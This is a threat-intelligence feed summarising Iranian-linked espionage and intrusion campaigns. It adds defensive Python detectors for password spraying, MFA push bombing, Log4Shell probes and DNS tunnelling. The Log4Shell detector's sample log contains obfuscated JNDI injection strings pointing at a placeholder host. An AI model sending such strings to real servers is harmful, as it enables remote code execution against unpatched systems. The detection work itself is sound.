Latest Update: 30/05/2025

Threats Feed

  1. Public

    Iranian APT Impersonates German Model Agency in Espionage Operation

    Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany’s Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and inactive album link suggest planned social engineering attacks. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group’s history of surveillance and influence operations against Iranian opposition figures.

  2. Public

    CyberAv3ngers’ Malware Hits IoT/OT Systems in Fuel and Energy Sectors

    Team82's research details the IOCONTROL malware, a custom-built cyberweapon used by Iran-linked attackers, specifically the CyberAv3ngers group. The malware targets a range of industrial control systems (ICS) and Internet of Things (IoT) devices, notably impacting fuel management systems in Israel and the US. IOCONTROL's functionality includes communication via the MQTT protocol and features such as arbitrary code execution and self-deletion. The analysis reveals the malware's infrastructure, including its command-and-control server and the methods used to evade detection. The report concludes that IOCONTROL represents a significant threat to critical infrastructure, highlighting the ongoing geopolitical conflict.

  3. Public

    Fake Assassination News Used in Phishing Attack Impersonating The New York Times

    A phishing campaign is exploiting sensational fake news about an assassination attempt on US President-elect Donald Trump by an Iranian sniper. The campaign poses as The New York Times using the email address newyork-times@nycmail[.]com. Victims who click on the embedded link are redirected to an ESET-imitation phishing site, where they are prompted to enter corporate domain credentials. This campaign is an example of attackers using major global events, such as political elections, to amplify their efforts. The use of urgency and sensational headlines highlights the need for vigilance in verifying information.

  4. Public

    Brute Force and MFA Push Bombing Tactics Used in Iranian Cyber Campaign

    Iranian cyber actors targeted critical infrastructure sectors in the US, Canada, and Australia, including healthcare, government, energy, and IT organisations. The attackers used password spraying and MFA push bombing (repeatedly sending MFA prompts until a fatigued user approves one) to obtain valid accounts and access systems such as Microsoft 365, Azure, and Citrix. Once inside, they used open source tools for credential access, including Kerberos SPN enumeration and Active Directory dumps. In some cases, the attackers attempted to exploit the Netlogon vulnerability (Zerologon) for privilege escalation. The actors also relied on living-off-the-land tools for discovery, identifying domain controllers, trusted domains and administrative accounts.

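    Both techniques in this advisory leave a recognisable shape in authentication logs: a spray is one source failing against many accounts in a short window, and push bombing is one account receiving a burst of MFA prompts, sometimes ending in an approval. The Python below is an added example, not code from the advisory or its authors; it runs offline over a constructed sign-in log, and the log format, the documentation-range IPs and the thresholds are assumptions for illustration rather than indicators from the advisory.

```python
"""Flag password spraying and MFA push bombing in sign-in logs.

Added example, not code from the advisory. The log lines below are
constructed for this example; real sign-in logs (Entra ID, Okta, ADFS)
carry the same fields under different names.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# One event per line: timestamp, account, source IP, password result,
# MFA outcome ("-" when no MFA prompt was sent). Assumed format.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"result=(?P<result>fail|ok) mfa=(?P<mfa>\S+)$"
)

# Constructed sample: one IP tries a password against six accounts,
# lands a valid password for "frank", then bombs him with prompts.
SAMPLE_LOG = """\
2024-10-15T08:00:00Z user=alice src=203.0.113.7 result=fail mfa=-
2024-10-15T08:00:05Z user=bob src=203.0.113.7 result=fail mfa=-
2024-10-15T08:00:09Z user=carol src=203.0.113.7 result=fail mfa=-
2024-10-15T08:00:14Z user=dave src=203.0.113.7 result=fail mfa=-
2024-10-15T08:00:20Z user=erin src=203.0.113.7 result=fail mfa=-
2024-10-15T08:00:26Z user=frank src=203.0.113.7 result=ok mfa=prompt_denied
2024-10-15T08:03:00Z user=frank src=203.0.113.7 result=ok mfa=prompt_denied
2024-10-15T08:03:40Z user=frank src=203.0.113.7 result=ok mfa=prompt_denied
2024-10-15T08:04:10Z user=frank src=203.0.113.7 result=ok mfa=prompt_denied
2024-10-15T08:04:55Z user=frank src=203.0.113.7 result=ok mfa=prompt_approved
2024-10-15T09:10:00Z user=alice src=198.51.100.4 result=fail mfa=-
2024-10-15T09:10:30Z user=alice src=198.51.100.4 result=ok mfa=prompt_approved
"""


def parse_events(text):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(
            tzinfo=timezone.utc
        )
        events.append(ev)
    return events


def _windows(evs, window):
    """Yield, for each event in time order, the run of events that ends at it
    and starts no earlier than `window` before it (sliding window)."""
    evs = sorted(evs, key=lambda e: e["ts"])
    start = 0
    for end, ev in enumerate(evs):
        while ev["ts"] - evs[start]["ts"] > window:
            start += 1
        yield evs[start:end + 1]


def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Source IPs whose failed logins hit >= min_accounts distinct accounts
    inside one window. Returns {src: sorted list of accounts}."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["result"] == "fail":
            by_src[ev["src"]].append(ev)
    hits = {}
    for src, evs in by_src.items():
        for run in _windows(evs, window):
            users = {e["user"] for e in run}
            if len(users) >= min_accounts and len(users) > len(hits.get(src, ())):
                hits[src] = sorted(users)
    return hits


def detect_push_bombing(events, window=timedelta(minutes=5), min_prompts=4):
    """Accounts that received >= min_prompts MFA prompts inside one window.
    `approved` records whether any prompt in a flagged run was accepted,
    which is the case that needs an immediate credential reset."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["mfa"].startswith("prompt_"):
            by_user[ev["user"]].append(ev)
    hits = {}
    for user, evs in by_user.items():
        for run in _windows(evs, window):
            if len(run) < min_prompts:
                continue
            hit = hits.setdefault(
                user, {"prompts": 0, "approved": False, "sources": set()}
            )
            hit["prompts"] = max(hit["prompts"], len(run))
            hit["approved"] |= any(e["mfa"] == "prompt_approved" for e in run)
            hit["sources"].update(e["src"] for e in run)
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("password spray:", detect_password_spray(evs))
    print("push bombing:", detect_push_bombing(evs))
```

    The thresholds are deliberately loose so the sample trips them; in production, tune the window and counts against a baseline of normal failure rates, and treat a flagged run that ends in `prompt_approved` as a confirmed account takeover rather than an alert to triage later. Sprays are usually spread across many source IPs, so the same window logic is worth running keyed on the attempted password hash or user-agent where the identity provider exposes it.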
  5. Public

    UNC1860 Targets Middle Eastern Networks with Specialized Tooling

    UNC1860, an Iranian state-sponsored group likely affiliated with the Ministry of Intelligence and Security (MOIS), targets government and telecommunications sectors in the Middle East, particularly in Saudi Arabia, Qatar, and Israel. The group acts as an initial access provider, exploiting vulnerabilities in internet-facing servers and deploying web shells like STAYSHANTE. Custom tools, such as TEMPLEPLAY and VIROGREEN, allow for remote access and further exploitation. UNC1860's operations are characterised by passive backdoors, credential validation, and stealthy malware that facilitates long-term persistence and hand-off to other threat actors. It's likely that the group has supported disruptive campaigns in the region.

  6. Public

    Malware Masquerading as Palo Alto GlobalProtect Targets Middle Eastern Organizations

    Threat actors are targeting users in the Middle East with malware disguised as the Palo Alto GlobalProtect VPN tool. Delivered likely through phishing, the malware employs a two-stage infection chain initiated via a malicious setup.exe. It uses advanced command-and-control (C2) infrastructure, including newly registered domains like “sharjahconnect” and the Interactsh project for beaconing. Written in C#, the malware supports remote PowerShell execution, file download/exfiltration, and AES-encrypted communications. It also features sandbox evasion, system information gathering, and beaconing mechanisms to track infection stages. This campaign highlights significant threats to organizations in the region, particularly those reliant on VPN-based remote access.

  7. Public

    Peach Sandstorm Targets US and UAE Critical Sectors with Tickler Malware

    Between April and July 2024, Iranian state-sponsored group Peach Sandstorm deployed a custom backdoor called Tickler in intelligence-gathering operations against satellite, communications, oil and gas, and government sectors in the US and UAE. Their tactics included password spray attacks and LinkedIn-based social engineering. Tickler malware leveraged Azure infrastructure for command-and-control (C2) and utilized DLL files for persistence. Peach Sandstorm also accessed compromised Active Directory accounts to further exploit targeted environments. Their evolving tradecraft demonstrates a persistent focus on the intelligence sector, including higher education, government, and defense.

  8. Public

    Iran-Based Hackers Target U.S. Sectors, Collaborate with Ransomware Affiliates

    Iran-based cyber actors linked to the Iranian government are exploiting organisations across multiple sectors in the US, including education, finance, healthcare, defence, and local government, as well as targets in Israel, Azerbaijan, and the UAE. Since 2017, these actors have focused on gaining and monetising network access, working with ransomware affiliates such as NoEscape, RansomHouse, and ALPHV (BlackCat). They exploit vulnerabilities in internet-facing services from Check Point, Palo Alto Networks and Citrix. They also use tools such as AnyDesk, PowerShell, Ligolo and ngrok for persistence and command and control.

  9. Public

    Iran's Cyber Operations Target 2024 US Presidential Election

    Iranian threat actors have launched cyber-enabled influence operations targeting the 2024 US presidential election. Groups such as Sefid Flood are impersonating social and political activist groups to undermine trust in authorities and sow discord. Iran's Islamic Revolutionary Guard Corps (IRGC)-linked Mint Sandstorm has been observed conducting spear-phishing campaigns against US presidential campaigns, while Peach Sandstorm has been engaged in password spray attacks on local government accounts. Additionally, the Iranian network Storm-2035 has been identified as operating covert news websites with the objective of polarising US voters. These operations form part of a broader Iranian effort to interfere with elections in the US and in other countries such as Bahrain and Israel, typically targeting political and government sectors.

  10. Public

    Handala Hack Intensifies Cyberattacks on Israeli Critical Infrastructure

    Handala has been targeting Israeli critical infrastructure and entities since December 2023. Their activities include phishing campaigns, ransomware attacks, and website defacements, often releasing partial evidence of success to bolster their reputation. Notable incidents include attacks on Israel's Iron Dome radar systems, a ransomware assault on Ma’agan Michael Kibbutz, and an alleged data breach of Zerto, a Hewlett Packard Enterprise subsidiary. The group utilizes sophisticated methods, including phishing links and attachments, to compromise and exfiltrate sensitive data. Handala is considered a serious cyber threat, primarily targeting Israel's critical sectors.

  11. Public

    Peach Sandstorm’s Multi-Faceted Attacks on Satellite, Defense, and Pharma Sectors

    Peach Sandstorm, an Iranian threat actor, has conducted password spray attacks since February 2023 against global organizations, notably in the satellite, defense, and pharmaceutical sectors. These attacks originated from TOR IPs and employed a mix of public and custom tools like AzureHound and Roadtools for reconnaissance. Once inside the network, the group established persistence through mechanisms like Azure subscriptions and Azure Arc. They also attempted to exploit vulnerabilities in Zoho ManageEngine and Confluence. Some instances involved data exfiltration and lateral movement using techniques like Golden SAML and remote desktop protocol (RDP).

  12. Public

    Iranian APT33 Intensifies Attacks on Multiple Sectors Worldwide

    APT33, an Iranian threat group active since 2013, targets multiple countries and sectors, primarily focusing on Saudi Arabia and the United States. The group employs spear phishing with malicious attachments and links, watering hole attacks, and uses both custom and commodity malware, including the Shamoon data-wiper. They exploit known vulnerabilities and leverage stolen credentials to gain access. Key targets include government, aerospace, petrochemical, engineering, finance, and telecom industries. APT33’s infrastructure includes domain masquerading and compromised servers. Recent activities include targeting cloud infrastructure and using spoofed domains to distribute malware.

  13. Public

    Iranian-backed APTs Target Aeronautical Sector: A Multi-Vector Attack

    The Cybersecurity and Infrastructure Security Agency (CISA), FBI, and Cyber National Mission Force (CNMF) identified multiple APT actors exploiting vulnerabilities in an Aeronautical Sector organization as early as January 2023. The actors targeted a public-facing application (Zoho ManageEngine ServiceDesk Plus) and the organization’s firewall device, exploiting CVE-2022-47966 and CVE-2022-42475. They gained unauthorized access, established persistence, moved laterally, and engaged in defense evasion by deleting logs. Although the attackers achieved extensive network enumeration and credential access, the report didn't confirm any data exfiltration.

  14. Public

    Iranian APTs Exploit Log4Shell to Compromise FCEB Network

    In April 2022, CISA detected Iranian government-sponsored APT activity compromising an FCEB organization's network via the Log4Shell vulnerability. Initial exploitation targeted an unpatched VMware Horizon server, later spreading to the domain controller. The threat actors utilized PowerShell commands, disabled Windows Defender, and established persistence through scheduled tasks. Tools like Mimikatz and Ngrok were deployed for credential harvesting and C2 communication. Despite attempts to dump the LSASS process, additional anti-virus measures thwarted this activity. Lateral movement was observed, as were activities aimed at credential and account manipulation.

  15. Public

    Iranian State-Sponsored Actors Exploit Log4Shell to Target US Government

    In April 2022, Iranian government-sponsored actors exploited the Log4Shell vulnerability in VMware Horizon servers to compromise a Federal Civilian Executive Branch (FCEB) organization. They installed XMRig crypto mining malware and used tools like Mimikatz and Ngrok for credential theft and tunneling. The attack involved disabling Windows Defender, downloading malicious files, hiding artifacts, and creating scheduled tasks for persistence. The campaign highlights the actors' practice of disabling security controls to maintain persistent access in US government networks.

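    The two Log4Shell entries above describe exploitation of unpatched VMware Horizon servers; the first thing most defenders did at the time was grep web and application logs for `${jndi:`, which misses the obfuscated lookups attackers used within days. The Python below is an added example, not code from the advisories or CISA; it resolves the common `lower`/`upper`/default-value lookup tricks and URL encoding before matching, over a constructed set of request lines whose IPs are documentation ranges rather than real indicators.

```python
"""Spot Log4Shell (CVE-2021-44228) probes in web logs, including obfuscated
forms that defeat a plain "${jndi:" string match.

Added example, not code from the advisories. The request lines below are
constructed; the IPs are documentation ranges, not real indicators.
"""
import re
from urllib.parse import unquote

# Innermost Log4j lookups attackers use to hide the "jndi" token:
#   ${lower:J} -> j      ${upper:j} -> J      ${anything:-j} -> j
# Each pattern only matches a lookup with no nested "${" inside, so
# nested forms resolve from the inside out across rounds.
LOWER_UPPER_RE = re.compile(r"\$\{(?P<op>lower|upper):(?P<arg>[^${}]*)\}")
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-(?P<default>[^${}]*)\}")

# Once normalised, a probe is a jndi lookup over a remote-fetch protocol.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def _case(m):
    arg = m.group("arg")
    return arg.lower() if m.group("op") == "lower" else arg.upper()


def normalize_lookups(s, max_rounds=20):
    """Resolve nested lower/upper/default lookups until nothing changes."""
    for _ in range(max_rounds):
        new = LOWER_UPPER_RE.sub(_case, s)
        new = DEFAULT_RE.sub(lambda m: m.group("default"), new)
        if new == s:
            return s
        s = new
    return s  # bounded: a pathological line cannot spin the scanner


def _decode(line):
    # Probes are frequently URL-encoded, sometimes twice; decoding a plain
    # line is harmless.
    return normalize_lookups(unquote(unquote(line)))


def is_log4shell_probe(line):
    """True if the line carries a jndi lookup after decoding/normalising."""
    return JNDI_RE.search(_decode(line)) is not None


def scan_log(lines):
    """Return (line_number, normalised_line) for every probe found."""
    return [(n, _decode(l)) for n, l in enumerate(lines, 1) if is_log4shell_probe(l)]


# Constructed sample request lines (path, protocol, user-agent).
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
    'GET /?x=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1 "curl/7.79"',
    'GET / HTTP/1.1 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/x}"',
    'GET / HTTP/1.1 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/o}"',
    'GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252F203.0.113.10%252Fz%257D HTTP/1.1 "-"',
    'GET /?t=${env:HOME} HTTP/1.1 "-"',
]


if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

    Run it over access logs, reverse-proxy logs and any field an application logs verbatim (User-Agent, X-Forwarded-For, form fields), since Log4j evaluated lookups wherever the string reached a logger. A match is evidence of a probe, not of compromise; the hosts in the advisories were compromised because the Horizon servers were unpatched, so the detection is most useful paired with an inventory of exposed Log4j versions.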
  16. Public

    Sophisticated PowerShell Attack Targets Systems with Spearphishing

    The Fully Undetectable (FUD) PowerShell backdoor report details a sophisticated attack beginning with a malicious Word document ("Apply Form.docm") used in a LinkedIn-based spearphishing campaign originating from Jordan. The document contains a macro that launches a PowerShell script, creating a scheduled task to execute further malicious actions. The backdoor communicates with its C2 server, executing various commands such as process list exfiltration, user enumeration, and Active Directory exploration. SafeBreach identified operational security mistakes allowing decryption of the C2 commands. The campaign, involving PowerShell scripts and scheduled tasks, targets systems for data exfiltration and potential lateral movement.

  17. Public

    CodeRAT Targets Farsi-Speaking Developers with Innovative C2 Techniques

    SafeBreach Labs has discovered CodeRAT, a new remote access trojan (RAT) targeting Farsi-speaking software developers with capabilities ranging from espionage to data exfiltration. Delivered via a Word document that exploits Microsoft DDE, CodeRAT monitors activity in various applications, particularly those related to social networking and development tools. Uniquely, it uses public file upload APIs and Telegram groups for command and control, bypassing typical C2 infrastructure. The malware supports 50 commands, including clipboard capture, process control and file upload. The CodeRAT developer released the source code on GitHub after it was discovered by researchers.

  18. Public

    Iranian Lyceum Group Deploys Malware Disguised as Adobe Update

    The Iranian SiameseKitten (Lyceum) group deployed new malware masquerading as an Adobe update, communicating with a command and control server. The malware includes a reverse shell and employs fake Microsoft certificates, echoing tactics seen with other Iranian groups like Phosphorus. The attack involved a lure PDF related to drone attacks in Iran, aiming to establish persistence via the Startup folder. The parent file and reverse shell were downloaded from domains registered on June 6th, highlighting the group's continued use of sophisticated detection avoidance techniques.

  19. Public

    Iranian-Linked POLONIUM Targets Israeli Manufacturing and Defense Industries

    POLONIUM, suspected to be coordinating with Iran's Ministry of Intelligence and Security, is actively targeting Israeli organizations across multiple sectors such as critical manufacturing, IT, and defense. The group exploits supply chain relationships by compromising IT companies to reach downstream organizations such as aviation companies and law firms. TTPs include custom implants like CreepyDrive that use cloud services for C2 and data exfiltration. MSTIC also notes overlap with the Iranian groups MERCURY and CopyKittens, both in the victims targeted and in techniques such as the use of AirVPN and OneDrive. Though unconfirmed, around 80% of observed victims were running Fortinet appliances, suggesting possible exploitation of CVE-2018-13379 for initial access.

  20. Public

    StrifeWater: Unmasking the New RAT Deployed by Iranian APT Moses Staff

    The Iranian APT group Moses Staff deployed a new, previously undocumented Remote Access Trojan (RAT) called StrifeWater for its cyber-espionage and disruption operations. The StrifeWater RAT has been used in initial attack stages, demonstrating various capabilities like listing system files, executing system commands, creating persistence, and downloading updates. Post-infection, it's replaced with ransomware not for financial gain but to disrupt operations and inflict system damage. Victims of these attacks span globally across countries like Israel, Italy, India, Germany, Chile, Turkey, UAE, and the US.

  21. Public

    Iranian Threat Actor Exploits MSHTML Vulnerability to Target Farsi Speakers

    SafeBreach Labs discovered an Iranian threat actor exploiting the MSHTML vulnerability (CVE-2021-40444) to infect Farsi-speaking victims with the PowerShortShell stealer via spear phishing. The attack, first reported in September 2021, involved a malicious Word document connecting to a server, downloading a DLL, and executing a PowerShell script. This script collected data, including screenshots and files, and exfiltrated it to the attacker's server. The campaign targeted Iranians abroad, particularly in the United States, suggesting ties to Iran's Islamic regime.

  22. Public

    Iranian APT Group Exploits Microsoft and Fortinet Vulnerabilities: A Broad Spectrum Cyber Assault

    Some Iranian government-sponsored APT groups have exploited vulnerabilities in Microsoft Exchange servers and Fortinet devices since March 2021. These actors broadly targeted critical infrastructure sectors in the US, including Transportation and Healthcare and Public Health, as well as Australian organizations. The APT group focused more on exploiting known vulnerabilities rather than specific sectors, using the gained access for ransomware deployment, data exfiltration, and extortion. Several tactics, techniques, and tools were utilized, including creating new user accounts and modifying Task Scheduler.

  23. Public

    Lyceum Intensifies Cyber Espionage on Tunisian Telecom and Aviation Sectors

    The Lyceum group (also known as Hexane) is a cyber threat actor focused on the telecommunications, energy and aviation sectors, particularly targeting high-profile organisations in Tunisia. Active since 2018, Lyceum has recently replaced its .NET-based malware with new C++ backdoors and PowerShell scripts to evade detection. The group continues to rely on DNS tunneling for command and control (C2) and uses tools for system reconnaissance, credential theft and keylogging. Lyceum also uses spoofed domains to disguise its activities, demonstrating an adaptive approach to persistent targeting of critical infrastructure.

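    DNS tunnelling of the kind Lyceum relies on for C2 has to encode data into query names, so the attacker's zone ends up receiving many unique, long, high-entropy subdomains that a legitimate zone rarely does. The Python below is an added example, not code from the Lyceum research or its authors; it scores zones on those three features over a constructed query log, and the `.invalid` zone, the client IPs and the thresholds are placeholders for illustration, not indicators.

```python
"""Score DNS zones for tunnelling behaviour: many unique, long, high-entropy
subdomains under one zone, as a DNS-tunnelling C2 channel produces.

Added example, not from the Lyceum research. The query log and zone names
below are constructed; the .invalid zone is a placeholder, not an indicator.
"""
import math
import re
from collections import Counter, defaultdict

# Assumed resolver log format: timestamp, client, query type, query name.
QUERY_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qtype>[A-Z]+) (?P<qname>\S+)$")

# Constructed sample: ordinary lookups plus one host pushing encoded data
# out in TXT queries. The 32-character labels stand in for encoded chunks.
SAMPLE_DNS_LOG = """\
2021-10-01T10:00:00Z 10.0.0.5 A www.example.com
2021-10-01T10:00:01Z 10.0.0.5 A mail.example.com
2021-10-01T10:00:02Z 10.0.0.5 A www.example.com
2021-10-01T10:00:03Z 10.0.0.5 A cdn.example.com
2021-10-01T10:00:04Z 10.0.0.9 TXT 0123456789abcdeffedcba9876543210.c2-example.invalid
2021-10-01T10:00:05Z 10.0.0.9 TXT 13579bdf02468ace02468ace13579bdf.c2-example.invalid
2021-10-01T10:00:06Z 10.0.0.9 TXT 048c159d26ae37bf048c159d26ae37bf.c2-example.invalid
2021-10-01T10:00:07Z 10.0.0.9 TXT fb73ea62d951c840fb73ea62d951c840.c2-example.invalid
2021-10-01T10:00:08Z 10.0.0.9 TXT 5a1e6b2f7c3d84095a1e6b2f7c3d8409.c2-example.invalid
2021-10-01T10:00:09Z 10.0.0.9 TXT 9e2d7c1b6a5f40839e2d7c1b6a5f4083.c2-example.invalid
2021-10-01T10:00:10Z 10.0.0.5 A static.example.org
"""


def shannon_entropy(s):
    """Bits per character over the string's own character frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_zone(qname):
    """Approximate the registered zone as the last two labels; everything
    to the left is the attacker-controlled subdomain part. Returns
    (zone, subdomain), with subdomain "" for a bare zone."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_queries(text):
    queries = []
    for line in text.splitlines():
        m = QUERY_RE.match(line.strip())
        if m:
            queries.append(m.groupdict())
    return queries


def score_zones(queries, min_unique=5, min_mean_len=20, min_mean_entropy=3.0):
    """Zones whose distinct subdomains are numerous, long and high-entropy.
    Returns {zone: feature dict} for zones over all three thresholds."""
    subs_by_zone = defaultdict(set)
    qtypes_by_zone = defaultdict(Counter)
    for q in queries:
        zone, sub = split_zone(q["qname"])
        qtypes_by_zone[zone][q["qtype"]] += 1
        if sub:
            subs_by_zone[zone].add(sub)
    suspects = {}
    for zone, subs in subs_by_zone.items():
        mean_len = sum(map(len, subs)) / len(subs)
        mean_entropy = sum(map(shannon_entropy, subs)) / len(subs)
        if (len(subs) >= min_unique and mean_len >= min_mean_len
                and mean_entropy >= min_mean_entropy):
            suspects[zone] = {
                "unique_subdomains": len(subs),
                "mean_len": mean_len,
                "mean_entropy": mean_entropy,
                "qtypes": dict(qtypes_by_zone[zone]),
            }
    return suspects


if __name__ == "__main__":
    for zone, f in score_zones(parse_queries(SAMPLE_DNS_LOG)).items():
        print(zone, f)
```

    The entropy test is what separates a tunnel from a merely busy zone: `www`, `mail` and `cdn` are short and repetitive, while encoded chunks look random. Content-delivery, anti-malware reputation and some telemetry services legitimately produce long hashed subdomains, so in practice this runs with an allowlist of known zones, and a TXT- or NULL-heavy query mix for an unfamiliar zone is worth weighting higher than the A-record case.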
  24. Public

    MalKamak Targets Middle Eastern Aerospace and Telecom Firms with ShellClient RAT

    The Iranian APT group MalKamak has been targeting aerospace and telecommunications companies in the Middle East since at least 2018, with additional victims in the US, Russia and Europe. The group uses ShellClient, a newly discovered remote access trojan (RAT), to conduct highly targeted cyberattacks. ShellClient uses Dropbox, a popular cloud-based service, for command and control (C2) operations, replacing the group's previous C2 infrastructure.
